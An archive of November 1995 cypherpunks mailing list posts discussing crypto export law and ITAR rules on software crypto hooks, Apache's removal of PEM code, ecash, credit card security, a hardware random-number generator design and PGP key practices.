To: cypherpunks@toad.com
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <Pine.3.89.9511140929.A25609-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


I just found this tidbit while following Sameer's Apache WWW server link.
For those who were wondering if plug-in crypto hooks were still watched 
out for. One wonders how the ietf folks are managing to promote internet-wide
standards that are considered unexportable (Are they? What's the deal on 
photuris, PEM, ipsec and the rest of them?)

Ps. I may be totally wrong, but I remember seeing something posted last 
month about some ZKIPS scheme in relation with Netscape (zero knowledge 
proofs with web servers, huh? Confused).


-----------------------------------------------------------------------
   [IMAGE] 
   
                         WHY WE TOOK PEM OUT OF APACHE
                                       
   On May 17th, 1995, we were asked by a representative of NCSA to remove
   any copies of NCSA httpd prior to 1.4.1 from our web site. They were
   mandated by the NSA to inform us that redistribution of pre-1.4.1 code
   violated the same laws that make distributing Phill Zimmerman's PGP
   package to other countries illegal. There was no encryption in NCSA's
   httpd, only hooks to publicly available libraries of PEM code. By the
   NSA's rules, even hooks to this type of application is illegal. 
   
   Because Apache is based on NCSA code, and we had basically not touched
   that part of the software, we were informed that Apache was also
   illegal to distribute to foreign countries, and advised (not mandated)
   by NCSA to remove it. So, we removed both the copies of the NCSA httpd
   we had, and all versions of Apache previous to 0.6.5. 
   
   The Apache members are strong advocates of the right to digital
   privacy, so the decision to submit to the NSA and remove the code was
   not an easy one. Here are some elements in our rationale: 
     * The PEM code in httpd was not widely used. No major site relied
       upon its use, so its loss is not a blow to encryption and security
       on the world wide web. There are other efforts designed to give
       much more flexible security - SSL and SHTTP - so this wasn't a
       function whose absence would really be missed on a functional
       level. 
     * We didn't feel like being just a couple more martyrs in a fight
       being fought very well by many other people. Rather than have the
       machine that supports the project confiscated or relocated to
       South Africa, etc., we think there are more efficient methods to
       address the issue. 
       
   It kind of sickens us that we had to do it, but so be it. 
   
   Patches that re-implement the PEM code may be available at a foreign
   site soon. If it does show up, we'll point to it - that can't be
   illegal! 
   
   Finally, here is a compendium of pointers to sites related to
   encryption and export law. We can't promise this list will be up to
   date, so send us mail when you see a problem or want a link added.
   Thanks. 
     * Yahoo - Science: Mathematics: Security and Encryption 
     * EFF Crypto/Privacy/Security Archive 
     * Crypto page at Quadralay 
     * Cryptography Export Control Archives (Cygnus) 
     * ICLU - Your Rights in Cyberspace 
       
   Brian, brian@hyperreal.com 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lbowen@eznet.net (Lloyd Bowen)
Date: Wed, 15 Nov 1995 01:17:39 +0800
To: cypherpunks@toad.com
Subject: BBS Generator Code Needed
Message-ID: <199511141529.KAA04080@shell1.eznet.net>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have 'C' code for the Blum-Blum-Shub PRN Generator handy?  I
would rather not have to write it myself if there is tested code available.
--8^}

Thanks
======================================================================
Lloyd Bowen
Paychex, Inc.
E-Mail to: lbowen@eznet.net
======================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Wed, 15 Nov 1995 01:15:26 +0800
To: cypherpunks@toad.com
Subject: Re: 4096 bit strong prime for Diffle-Hellman
In-Reply-To: <Pine.SOL.3.91.951114090156.23102A-100000@orb>
Message-ID: <Pine.SOL.3.91.951114105404.13469A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 14 Nov 1995, Eric Young wrote:
> Even if the private DH values are pre-calculated, this will only halve the
> time of the DH operation and if this is done it looses the advantage of DH
> in that if the private/public pair are 'generated on the fly',
> pre-recorded session will not be able to be decoded if the private key is

Urk, that reads very badly what I ment is that since a different
public/private key is used per session, if a private key is revealed, any
previous and future comunication between the 2 entities is not
compromised, only the particular session using that public/private key pair.
Also since the key pair is generated on the fly, they don't need to be 
recorded on disk etc, so they only way to get the private key is to 
'hack' the application at runtime (or modify it in advance).

eric (who is have a bad day converting his thoughts to english...).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 15 Nov 1995 03:56:52 +0800
To: cypherpunks@toad.com
Subject: c2.org now accepts ecash
Message-ID: <199511141926.LAA05987@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	We now accept ecash: http://www.c2.org/signup.phtml

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 15 Nov 1995 01:37:44 +0800
To: cypherpunks@toad.com
Subject: FKI_osk
Message-ID: <199511141703.MAA01329@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-14-95. Washrag:


   "FBI Targets Expected Growth In Computer Crime."

      The FBI is beefing up its fight against computer crime.
      A Washington office, which handles international cases,
      was established in 1993. The San Francisco office will
      keep a close eye on activities in Silicon Valley, while
      the New York squad will handle financial-related
      computer crimes.


   "Postal Service Planning to Sell Prepaid Telephone Cards."

      Because the phone cards are "stored value cards," they
      could offer the Postal Service a logical first step
      toward the use of a "smart card" that might be used in
      connection with an information kiosk the agency is
      developing for the federal government to provide the
      public with a computer link to the federal bureaucracy.
      Long-range plans for the kiosk call for use of smart
      cards that would enable people to receive government
      payments, such as welfare benefits or checks for food
      stamps.


   FKI_osk  (7 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 15 Nov 1995 04:26:30 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <9511141920.AA13573@sulphur.osf.org>
Message-ID: <Pine.SOL.3.91.951114115921.17855A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 Nov 1995, Rich Salz wrote:

> As I said in my original message about Pegasus:
> 	The NSA consider this kind of thing "crypto with a hole"
> 	It's stupid, the hole is the crypto.  But, the rest of
> 	the code is considered by the Agency to be an "ancilliary
> 	device" as defined under ITAR.

The interesting question is how narrow the interface has to be before it 
becomes in violation of the ITAR. Is the key question whether the "holes" 
are specifically designed for the insertion of cryptographic materials, 
or is it the fact that they could be used to support cryptographic 
enhancements?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmacfarlane@zip.sbi.com (David Macfarlane)
Date: Wed, 15 Nov 1995 02:28:24 +0800
To: cypherpunks@toad.com
Subject: Re: BBS Generator Code Needed
Message-ID: <9511141749.AA28423@zip_master2.sbi.com>
MIME-Version: 1.0
Content-Type: text/plain


> Does anyone have 'C' code for the Blum-Blum-Shub PRN Generator handy?  I
> would rather not have to write it myself if there is tested code available.
> --8^}
>
> Thanks
> ======================================================================
> Lloyd Bowen
> Paychex, Inc.
> E-Mail to: lbowen@eznet.net
> ======================================================================

Wei Dai's crypto++ has BBS, if you can find a copy.

	David.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 15 Nov 1995 05:24:49 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Credit Card security in the New York Times
Message-ID: <199511142050.MAA20488@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 Nov 1995, Nelson Minar wrote:

> Today's New York Times has a nice article in the business section
> about credit card security on the Internet. It's more of an editorial
> than an article, but it's an editorial with the (IMNSHO) right spin:
> shipping a credit card number over the Internet, even unencrypted, is
> no less secure than giving it out over the phone.

I haven't picked up the paper and looked at the article.  Once in a blue
moon, I might pick up the International Herald Tribune, but only on the
rarest of rare circumstances, but this worries me.  

And it really should worry everyone who might have some interest in harm
reduction. 

If someone in the Business Section of the New York Times is writing as you
say -- writing that shipping a credit card number UNENCRYPTED over the
Internet is no less secure than giving it out over the phone, then we have
a SERIOUS communications/understanding gap to overcome. 

It seems like not only the NY Times, but the "You Will" folk at AT&T don't
quite "get" it.  (The AT&T swipe, is for the idjit that sent me email on
postcard via bucket brigade, and then asked me to please keep it
"private".)

A simple understanding is necessary if we're going to use this 
snazzy new technology, and not kill the goose that lays the golden 
egg.  An understanding that the NY Times, or its *experts* don't seem to 
have.

A telephone connection goes from one point to another.  It's like a 
football pass.  An internet connection is different, it's like an old 
fashioned bucket brigade.

Now, if you were to write a message on a football, and throw it, while
their is a "risk" of inteception you can be reasonably certain that the
message on the ball will be "reasonably" safe while flying through the 
air.  This is the phone call "football" analogy..

The net however does not establish a direct connection like a telephone
call.  It works like the old "bucket brigade" of volunteer fire
departments.  Your message is handed off -- handed to the next person in a
chain, who then hands it to the next, and so on. 

Your "message" (or credit card number) is effectively written on a
postcard and passed around from person to person, before it gets to your
final destination.  This makes it completely different than the telephone
call.  Orders of magnitude different.

So here's the question ... and here's the comparison.  Would you, if you
were in New York, buy something with your credit card using the following
payment method. 

Would you, write your credit card number on the back of a postcard, and
leave it with your neighbour, with instructions to give to the doorman,
who's supposed to flag a cabbie and tell him to take it to a building, to
then give it to another doorman, who will leave it with the business next
door to give to the person or business that you want to have your credit
card number?? 

Why not??  Does this strike any reader as something really silly??  

Because, this is actually the way the Internet works.  This is exactly how
any message, whether its your email, or your credit card number gets from
Point A to Point B.  A message that is going from one computer, even to
one just down the block, might end up going through twenty or third
"hands" before being delivered. 

This is what makes the Internet rather unsafe, far more unsafe than a
telephone call.  And this lack of understanding, the lack of understanding
in the press is what makes the Internet even unsafer.  It is people being 
very cavalier.

Many people trust the NY Times to "get it right", then again, the  investor
also trusts that these companies actually know what they're doing. 

The public deserves better.

> The NYT has been doing a nice job covering computer issues in the past
> few months, in the Monday's business section. Worth reading if you
> want to keep an eye on intelligent media coverage of the net.

If this is the "intelligent media coverage", then how on earth are they
going to be able to cover "taking down" the Internet for some repairs?? 

And how are they gonna cover the inevitable, Internet crime of the
century? 



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Wed, 15 Nov 1995 02:34:08 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <Pine.3.89.9511140929.A25609-0100000@tesla.cc.uottawa.ca>
Message-ID: <199511141758.MAA14695@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


s1113645@tesla.cc.uottawa.ca writes:

> For those who were wondering if plug-in crypto hooks were still watched 
> out for. One wonders how the ietf folks are managing to promote internet-wide
> standards that are considered unexportable (Are they? What's the deal on 
> photuris, PEM, ipsec and the rest of them?)

>                          WHY WE TOOK PEM OUT OF APACHE
>                                        
>    On May 17th, 1995, we were asked by a representative of NCSA to remove
>    any copies of NCSA httpd prior to 1.4.1 from our web site. They were
>    mandated by the NSA to inform us that redistribution of pre-1.4.1 code
>    violated the same laws that make distributing Phill Zimmerman's PGP
>    package to other countries illegal. There was no encryption in NCSA's
>    httpd, only hooks to publicly available libraries of PEM code. By the
>    NSA's rules, even hooks to this type of application is illegal. 

Does anyone know the ostensible justification for this?  What section of
the ITARs do they point to when they say "this is illegal"?  I've perused
an online copy of ITAR (no, I haven't read all of it -- I have other
things I want to do this year :-), but I can't find a section that could
be construed to support this contention.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 15 Nov 1995 06:34:49 +0800
To: cypherpunks@toad.com
Subject: setting up an ecash shop
Message-ID: <199511142206.OAA22935@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	If you'd like to setup an ecash shop as a merchant, you can
do it this week and have the $300 setup fee waived. (This
is for the $5/month 2% movement fee account-- the most expensive one
they have.) I setup my eshop@c2.org thing using the promotion.
	Information is at http://www.marktwain.com/promo.html

	(The $300 setup fee I think is outrageous, but at least this
week you don't have to worry about it.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 15 Nov 1995 06:40:58 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Credit Card security in the New York Times
Message-ID: <199511142212.OAA14291@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:50 11/14/95 -0800, anonymous-remailer@shell.portal.com wrote:
>On Mon, 13 Nov 1995, Nelson Minar wrote:
>
>> Today's New York Times has a nice article in the business section
>> about credit card security on the Internet. It's more of an editorial
>> than an article, but it's an editorial with the (IMNSHO) right spin:
>> shipping a credit card number over the Internet, even unencrypted, is
>> no less secure than giving it out over the phone.
>
>I haven't picked up the paper and looked at the article...
>
>If someone in the Business Section of the New York Times is writing as you
>say -- writing that shipping a credit card number UNENCRYPTED over the
>Internet is no less secure than giving it out over the phone, then we have
>a SERIOUS communications/understanding gap to overcome. 

I did read the article.  It said, "The truth is that sending a credit card
number to an electronic merchant over the Internet is probably the safest
way to make such a transaction.

"In the last week, for example, I handed my credit card to a waiter who
disappeared with it for five minutes.  I faxed my credit card information
to a business in New Jersey, and the fax probably lay exposed to everone in
that office for hours and perhaps to the cleaning crew than night. ...

"Yes, there is a risk that someone was tapping my telephone when I read my
credit card number aloud or faxed it.  [reminder about cell phones deleted]
 A spy might have snapped a picture of my credit card with a hidden camera
when I handed it to the waiter.  A hacker might have intercepted my numbers
as they passed through an Internet router in Hackensack, N.J.

" But compared with the risk of handing my credit card to a stranger, which
I do nearly every day, sending it over the Internet is pretty secure.

"The real reisk of sending my unencrypted number is not that some
cyberspace cowboy will intercept it en route to the electronic merchant,
but rather that the receiving company will store my credit information in
an insecure computer. ...

"My credit card number was probably among the 30,000 or so that were lifted
last year from unsecured computers of Netcom ...

"Willy Sutton did not myug individuals for their wallets; he robbed banks,
because, as he noted, that's where the money was...

"... The people who should be really nervous about electronic commerce are
the banks, brokerage houses and those who do business-to-business
transactions."


In context, a much more reasonable view than the anonymous poster suggests.
 I add, that with an insurance policy (that you are forced to pay for)
which broadly limits your risk to $50, you don't have to be all that
carefull.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Wed, 15 Nov 1995 04:33:38 +0800
To: cypherpunks@toad.com
Subject: Good Enough?
Message-ID: <30a8f8836ed1002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


We're looking at providing good tools for digital signatures on
e-mail here, for users that are interested. We plan to make available
PGP public keys in the student/staff X.500 directory, with suitable
tools for retrieving keys, etc. A couple questions have come up that
make me wonder what would be an acceptable service, at least given
the environment that we have to work with.

The first question has to do with key generation. One of the managers
was of the opinion that we could do the key generation for the user,
and either email or otherwise make the private key available to the 
user. The idea is to make it easy for the user to create their keys
by providing a web interface, etc. BTW, we're running Netscapes 
Commerce server so we could expect at least 40 bits of protection
(big deal, I know) on the passphrase transmission. The good enough
part is due to the idea that we're running a couple of large multi-
user machines, with all the risks those entail. Note also that 
we would not be keeping logs or otherwise compromising the keys
ourselves, this would strictly be a user-friendly way to get people
using signatures. We would also accept keys that users create themselves,
this would only be one option.

Second, the web of trust might also be useful, so we could sign
users keys to certify them. Has anyone worked in an organization
of some sort that has a structured approach to key certification
using PGP?

This is just in the preliminary talking stages at this point,
but I thought I'd toss these 2 ideas out for comments to see
what people here think.

 
-- 
Kevin L. Prigge        |"A computer lets you make more mistakes faster 
UofM Central Computing | than any invention in human history--with the 
email: klp@cis.umn.edu | possible exceptions of handguns and tequila."
01001101100010110010111|- Mitch Ratcliffe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 15 Nov 1995 03:52:00 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <9511141920.AA13573@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


As I said in my original message about Pegasus:
	The NSA consider this kind of thing "crypto with a hole"
	It's stupid, the hole is the crypto.  But, the rest of
	the code is considered by the Agency to be an "ancilliary
	device" as defined under ITAR.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Wed, 15 Nov 1995 03:48:33 +0800
To: Lloyd Bowen <lbowen@eznet.net>
Subject: Re: BBS Generator Code Needed
In-Reply-To: <199511141529.KAA04080@shell1.eznet.net>
Message-ID: <Pine.3.89.9511141448.A37638-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 14 Nov 1995, Lloyd Bowen wrote:

> Does anyone have 'C' code for the Blum-Blum-Shub PRN Generator handy?  I
> would rather not have to write it myself if there is tested code available.
> --8^}
They have one at the big motherload at 
<ftp://ftp.dsi.unimi.it/pub/security/crypt/code> 
Wei Dai's crypt++ also has one in C++.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Wed, 15 Nov 1995 06:53:07 +0800
To: cypherpunks@toad.com
Subject: Hardware-random-bits interface
Message-ID: <199511142231.OAA25441@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been thinking about physically random bits recently, so
I'd like to offer a simple, easily implementable interface to a
source of such bits, along with a design sketch using a common
radio receiver chip as the noise source.  The interface consists
of two bits in the standard PC parallel port, one serving as
the data line and the other the sampling clock.

The parallel port, while a bit less universal than RS-232, eliminates
the complexity of UARTs and clock generation and offers higher speed
and friendlier local power.  For an ISA bus running at 8 MHz, bits can
be sampled at about 2.5 Mb/s, i.e., about 300 kB/s.  (The bandwidth of
the noise source should of course be consistent with this.)  Another
advantage of a simple device is that it can be thoroughly inspected:
there is no PLD or microcontroller code to vet/trust.

Not all parallel ports have bidirectional data registers, so the
most general path is to assign a status bit to the input and
use a control bit for the clock output.  I'm using bit 4 of
the status register (pin 13 on the PC's DB-25) as the input
and bit 0 of the control register (pin 1) as the clock.
Specifically, the rising edge of pin 1 should sample the noise
waveform and present the result on pin 13.  (Pin 1 is inverted,
so bit 0 should transition from 1 to 0.)

I'd also like to suggest a device name for the Unix environment,
/dev/prandom, for "physically random".  The intention is that the
bits returned be as raw as possible, as close to the physics as
possible, leaving any debiasing/hashing to other software (for
example, the /dev/random implementation in recent Linux kernels).
(I have a Linux device driver that implements this interface;
it is very simple, needing only to sample the bits, pack them
into bytes, and manage mutual exclusion, filesystem housekeeping,
and probing.)

Here are the particulars of the "dongle" board I'm in the
process of making.

  Noise source:  an FM/IF radio receiver chip, with no input
    supplied, so that the IF amplifier chain produces wideband
    noise at its output.  I'm looking at the Motorola MC13158
    and the Philips SA626.  Each provides about 20 MHz of
    IF bandwidth, and the Motorola part has an on-chip
    comparator, reducing the entire device to two chips:
    the receiver chip and an HCMOS flip-flop.

  Power:  from the port data lines; >=3.5V at about 20 mA is
    available.

  Device probing:  the device should somehow identify itself
    as a random bit generator.  One way to do this is to wire
    one of the parallel port data bits to a status line; for
    example, data bit 0 (pin 2) could be wired to status bit 5
    (pin 12).  Software can then twiddle the data bit and
    watch for the response.

  Cost:  around $10 in parts, I guess.

A rate of 300 kB/s will make a 600 MB one-time pad in an hour
(assuming software is similarly fast).  I'm wondering if any
of the mail systems have convenient hooks to use pads (though
it would not be difficult to write up).

Suggestions welcome.  I'll put the design on the Web
once it's finished; replicating it should be pretty easy.
People can also grab the device driver if they wish.

Cheers,
Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 15 Nov 1995 04:55:41 +0800
To: Jeff Barber <jeffb@sware.com>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <199511141758.MAA14695@jafar.sware.com>
Message-ID: <199511142038.PAA07035@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Barber writes:
>Does anyone know the ostensible justification for this?  What section of
>the ITARs do they point to when they say "this is illegal"?  I've perused
>an online copy of ITAR (no, I haven't read all of it -- I have other
>things I want to do this year :-), but I can't find a section that could
>be construed to support this contention.

I think it's 121.1, Category XIII paragraph (b) item (5):
"Ancillary equipment specifically designed or modified for paragraphs (b)
(1), (2), (3), (4) and (5) of this category;"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@sunflash.eng.usf.edu>
Date: Wed, 15 Nov 1995 04:17:24 +0800
To: Jeff Barber <jeffb@sware.com>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <199511141758.MAA14695@jafar.sware.com>
Message-ID: <Pine.SUN.3.91.951114144604.9607A-100000@sunflash.eng.usf.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Tue, 14 Nov 1995, Jeff Barber wrote:

> s1113645@tesla.cc.uottawa.ca writes:
> 
> Does anyone know the ostensible justification for this?  What section of
> the ITARs do they point to when they say "this is illegal"?  I've perused
> an online copy of ITAR (no, I haven't read all of it -- I have other
> things I want to do this year :-), but I can't find a section that could
> be construed to support this contention.

  I scanned through the ITAR, and I agree that there doesn't seem to be 
anything about hooks that are illegal, but the NSA does have the 
authority to protect whatever threatens national security.  If they are 
over-stepping their bounds who is going to push it to court to find out, 
as that is where the decision would have to be made (very expensive).
  Take care and have fun.

James Black





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 15 Nov 1995 05:29:36 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <Pine.SOL.3.91.951114115921.17855A-100000@chivalry>
Message-ID: <199511142054.PAA07674@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero writes:
>The interesting question is how narrow the interface has to be before it 
>becomes in violation of the ITAR. Is the key question whether the "holes" 
>are specifically designed for the insertion of cryptographic materials, 
>or is it the fact that they could be used to support cryptographic 
>enhancements?

If the ban *is* due to Category XIII (b) (5), the wording would
indicate that the "hole" must be "specifically designed or modified" to
support crypto.  One that was specifically designed to support some
sort of block compression library should be exempt under that
paragraph, even if someone else were to write and distribute a crypto
library with an identical interface.

'Course, IANAL, and the interpreters of the ITAR don't really seem to
care what it *says*, anyway.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Cabeen <cabeen@netcom.com>
Date: Wed, 15 Nov 1995 05:41:38 +0800
To: cypherpunks@toad.com
Subject: Repeated Words/characters in Password/Phrase
Message-ID: <199511142111.NAA08624@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Do repeated words in a PGP passphrase make the pass phrase less secure than
a passphrase without any repeated words?  And on the same note, do repeated
letters in a UNIX password make that password easier to break? I can't seem
to find anything in my books on cryptography that mention this.  Thanks.
_____________________________________________________________________________
Ted Cabeen                                                  cabeen@netcom.com
Finger for PGP Public Key                        secabeen@midway.uchicago.edu
"I have taken all knowledge to be my province."            cococabeen@aol.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Wed, 15 Nov 1995 07:42:10 +0800
To: cypherpunks@toad.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <199511142110.NAA28546@email.pdcorp.com>
Message-ID: <199511142322.PAA24924@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


I move we file a CJR on some suitable software with crypto hooks. Off
the top of my head, the most plausible candidate is NCSA httpd v1.3.
It's certainly software with function other than crypto. It's also the
case that the crypto hooks are nearly unusable. I should know - I got
quoted in USA Today for buying three CDs using these hooks ;-).

Another possibility that comes to mind is Eudora. A judgement that
Eudora is non-exportable is certain to piss a lot of people off. I'm
not sure whether that's a good thing or a bad thing. I promise not to
file a CJR without the express permission of the owners of the
software.

Such a CJR would certainly not be frivolous. It is certainly the case
that the law is not clear enough for software producers to move with
confidence. Further, applications with crypto hooks are much more
important to the cpunk cause than are the crypto applications
themselves. Face it: PGP is available to all, but very few people
actively use it. Its serious usability problems are only a small part
of the reason. The real reason is that people are unwilling to
integrate with it because they're afraid of the export controls.

By the way, I have not heard back regarding my t-shirt CJR. If I have
time, I'll call them tomorrow and ask what's up.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cassiel@alpha.c2.org (Cassiel)
Date: Wed, 15 Nov 1995 08:15:14 +0800
To: cypherpunks@toad.com
Subject: Cypherpunk FAQ
Message-ID: <199511142338.PAA03302@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Hi, I'm new to the list, so please don't flame me too badly if this is a dumb question.  At least restrict the flames to private email where no one else can hear me scream.  :>

I downloaded the Cypherpunk FAQ from the Cypherpunk Website.  When I decompressed it, all it contained were the words "Yoo hoo, anybody home?"  Has the FAQ been corrupted or is this an in-joke?

Also, the Privacy FAQ states it was written by L. Detweiler.  Is this THE L. Detweiler?  If so, why is it in the archives?

Thanks for helping me out.

Cassiel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 15 Nov 1995 05:19:35 +0800
To: James Black <black@sunflash.eng.usf.edu>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <Pine.SUN.3.91.951114144604.9607A-100000@sunflash.eng.usf.edu>
Message-ID: <199511142050.PAA05867@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



James Black writes:
>   I scanned through the ITAR, and I agree that there doesn't seem to be 
> anything about hooks that are illegal, but the NSA does have the 
> authority to protect whatever threatens national security.

Since when? They aren't a police agency. They have no power to arrest
or prosecute, and they don't even (directly) make any decisions on any
of this stuff (although they are responsible for the decisions that
made).

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin C Sweitzer <msew+@andrew.cmu.edu>
Date: Wed, 15 Nov 1995 05:23:02 +0800
To: cypherpunks@toad.com
Subject: world smartcards..
In-Reply-To: <9510200413.AA17440@sulphur.osf.org>
Message-ID: <AkeE5Ve00WBMQ8F_Qw@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anyone know what kind of encryption they will be using...


------------------------------------------------------------------
HP builds security for smartcard shopping
=========================================
Hewlett-Packard is bidding for US government approval for a
worldwide cryptographic framework, which is being to provide a
security for a joint smartcard project with Gemplus and
Informix.

The three companies plan to develop a secure personal
information card system, with which businesses can deliver
services including Internet-based transactions to consumers.
The encrypted cards will carry several thousand times the
amount of data on current smartcards and will (pending US
export approvals) be usable anywhere in the world.

HP is providing server, encryption, middleware and networking
technologies. Gemplus will provide advanced smart-card tech-
nology. Database and middleware technologies will come from
Informix. The alliance was launched at Telecom 95.

HP's proposed non-user-accessible cryptography is the first
element in an international open cryptography framework, with
which it hopes to deliver security technology compliant with
US export regulations.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Wed, 15 Nov 1995 08:11:07 +0800
To: cypherpunks@toad.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <m0tFUJh-00091rC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner <sjb@universe.digex.net> writes:

>Jeff Barber writes:
>>Does anyone know the ostensible justification for this?  What section of
>>the ITARs do they point to when they say "this is illegal"?  I've perused
>>an online copy of ITAR (no, I haven't read all of it -- I have other
>>things I want to do this year :-), but I can't find a section that could
>>be construed to support this contention.
>
>I think it's 121.1, Category XIII paragraph (b) item (5):
>"Ancillary equipment specifically designed or modified for paragraphs (b)
>(1), (2), (3), (4) and (5) of this category;"

Question:  What makes computers in general NOT describable by such a
paragraph?!?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 15 Nov 1995 05:46:08 +0800
To: Kevin L Prigge <klp@gold.tc.umn.edu>
Subject: Re: Good Enough?
In-Reply-To: <30a8f8836ed1002@noc.cis.umn.edu>
Message-ID: <199511142124.QAA23598@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hi.

First, I must warn you that generating keys on behalf of users is in
general a very bad thing to do.  Instead, you might want to provide a
simple way for users to generate keys and get them certified.  The
biggest problem is that there is not an easy way to get a good set of
random numbers on a server platform.  On the other hand, users can get
a great deal of randomness on their own client machines.  If they can
run netscape, then they can run PGP.

Second, you might want to look at a paper that Jeff Schiller and I
wrote for the 1995 Usenix conference on scaling the web of trust.
The paper is available off my home page or via ftp:
	toxicwaste.mit.edu:/pub/pgpsign/scaleweb.{txt,PS}

The sources to the keysigner are also in the same directory.

Hope this helps.

-derek

       Derek Atkins, SB '93 MIT EE, SM '95 MIT Media Laboratory
       Member, MIT Student Information Processing Board (SIPB)
    Home page: http://www.mit.edu:8001/people/warlord/home_page.html
       warlord@MIT.EDU    PP-ASEL     N1NWH    PGP key available




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Wed, 15 Nov 1995 06:13:13 +0800
